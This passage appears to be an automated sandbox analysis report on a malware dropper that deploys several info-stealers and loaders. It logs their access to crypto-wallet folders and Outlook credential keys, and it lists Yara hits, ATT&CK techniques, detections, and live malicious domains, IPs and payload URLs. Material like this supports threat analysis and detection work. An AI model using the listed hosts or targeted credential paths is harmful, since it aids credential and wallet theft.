Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rHCHrI9F0v.exe PID: 1012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4928, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000018.00000002.2259797317.0000000003029000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 5416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Setup.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: channel3.exe PID: 5192, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 37.2.BitLockerToGo.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2732580728.00000000014EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2612049284.000000000196C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2578867327.0000000000591000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 15.0.CZjRdKVnFB.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.build.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.2003484391.0000000000A12000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.2385848983.0000000000BE2000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2004782582.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.crypted.exe.3f75570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.436060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.436060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.crypted.exe.41a5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.crypted.exe.3f75570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.rHCHrI9F0v.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2004024984.00000000004A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2106632894.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1959861483.0000000003F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2703663881.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.2745709445.0000000000420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 4216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CZjRdKVnFB.exe PID: 4536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rHCHrI9F0v.exe PID: 1012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4928, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7068, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 15.0.CZjRdKVnFB.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.build.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0049EAA8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	19_2_0049EAA8
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 19_2_0049DDB1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	19_2_0049DDB1
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0064EAA8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	20_2_0064EAA8
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 20_2_0064DDB1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	20_2_0064DDB1
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA40C40 sqlite3_bind_zeroblob,	22_2_6CA40C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA40D60 sqlite3_bind_parameter_name,	22_2_6CA40D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C968EA0 sqlite3_clear_bindings,	22_2_6C968EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6CA40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	22_2_6CA40B40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C966410 bind,WSAGetLastError,	22_2_6C966410
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C9660B0 listen,WSAGetLastError,	22_2_6C9660B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C96C030 sqlite3_bind_parameter_count,	22_2_6C96C030
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C96C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	22_2_6C96C050
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 22_2_6C966070 PR_Listen,	22_2_6C966070

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	11 Scheduled Task/Job	612 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	11 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Command and Scripting Interpreter	Login Hook	11 Registry Run Keys / Startup Folder	1 Install Root Certificate	NTDS	459 System Information Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	11 Scheduled Task/Job	Network Logon Script	Network Logon Script	23 Software Packing	LSA Secrets	1091 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	571 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	571 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	612 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Amadeus[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\crypteda[1].exe	100%	Joe Sandbox ML
C:\Users\user\1000238002\Amadeus.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\1000238002\Amadeus.exe	37%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\Setup[1].exe	46%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Amadeus[1].exe	37%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted[1].exe	83%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\runtime[1].exe	58%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe	92%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\Set-up[1].exe	83%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\channel3[1].exe	51%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\crypteda[1].exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\1[1].exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe	100%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	79%	ReversingLabs	Win32.Trojan.Whispergate
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	100%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	83%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	100%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	92%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	83%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000191001\1.exe	71%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe	46%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000241001\build.exe	79%	ReversingLabs	Win32.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	58%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe	51%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	50%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	57%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\svchost015.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	92%	ReversingLabs	Win32.Spyware.Multiverze
C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Pictures\Lighter Tech\runtime.exe	58%	ReversingLabs	Win32.Trojan.Amadey

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
locatedblsoqp.shop	100%	URL Reputation	phishing
millyscroqwp.shop	100%	URL Reputation	malware

Name	IP	Active	Malicious	Antivirus Detection
cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com	52.212.52.84	true	false
locatedblsoqp.shop	188.114.96.3	true	true	100%, URL Reputation
transfer.adminforge.de	176.9.8.206	true	false
millyscroqwp.shop	188.114.97.3	true	true	100%, URL Reputation
fivexv5pn.top	195.133.48.136	true	true
thirtv13vt.top	195.133.13.230	true	true
ddl.safone.dev	unknown	unknown	false
fivexv5vs.top	unknown	unknown	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.202.233.158/3836fd5700214436/msvcp140.dll	true
http://91.202.233.158/e96ea2db21fa9a1b.php	true
http://185.215.113.19/CoreOPT/index.php	true
analforeverlovyu.top	true
stamppreewntnq.shop	true
http://185.215.113.19/ProlongedPortable.dll	true
95.179.250.45:26212	true

URLs from Memory and Binaries

Name	Source	Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegAsm.exe, 0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002D.00000003.2692467144.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php?scr=19:RkC	AppLaunch.exe, 0000001F.00000002.2753292846.00000000053DD000.00000004.00000020.00020000.00000000.sdmp	false
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	axplong.exe, 00000007.00000002.2766434406.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, 1[1].exe.7.dr	false
http://ddl.safone.dev/3846244/1.exe?hash=AgADek	axplong.exe, 00000007.00000002.2766434406.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id23ResponseD	RegAsm.exe, 0000000B.00000002.2110237826.000000000369D000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp	false
